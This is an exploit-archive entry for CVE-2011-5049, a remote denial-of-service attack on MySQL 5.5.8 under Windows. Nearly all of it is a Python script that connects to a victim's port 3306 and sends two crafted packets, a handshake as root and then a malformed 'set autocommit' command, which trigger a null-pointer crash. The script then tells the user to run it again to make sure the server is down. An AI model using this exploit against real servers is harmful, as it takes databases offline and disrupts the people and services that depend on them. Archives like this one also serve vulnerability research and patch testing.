MySQL 5.5.8 Remote Denial Of Service (DOS)



EDB-ID: 18269 CVE: 2011-5049 OSVDB-ID: 78283
Author: Level Published: 2011-12-24 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
import socket, sys 

print "\n" 
print "----------------------------------------------------------------" 
print "| MySQL 5.5.8 Null Ptr (windows)                                |" 
print "| Level Smash the Stack                                         |" 
print "----------------------------------------------------------------" 
print "\n" 

buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

buf2=("\x11\x00\x00\x00\x03set autocommit30")

def usage(): 
print "usage : ./mysql.py <victim_ip>" 
print "example: ./mysql.py 192.168.1.22" 


def main(): 
if len(sys.argv) != 2: 
usage() 
sys.exit() 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

HOST = sys.argv[1] 
PORT = int(3306) 
s.connect((HOST,PORT)) 
print "[*] Connect" 
s.send(buf)
print "[*] Payload 1 sent"
s.send(buf2) 
print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n" 
s.close() 

if __name__ == "__main__": 
main()






Comments

No comments so far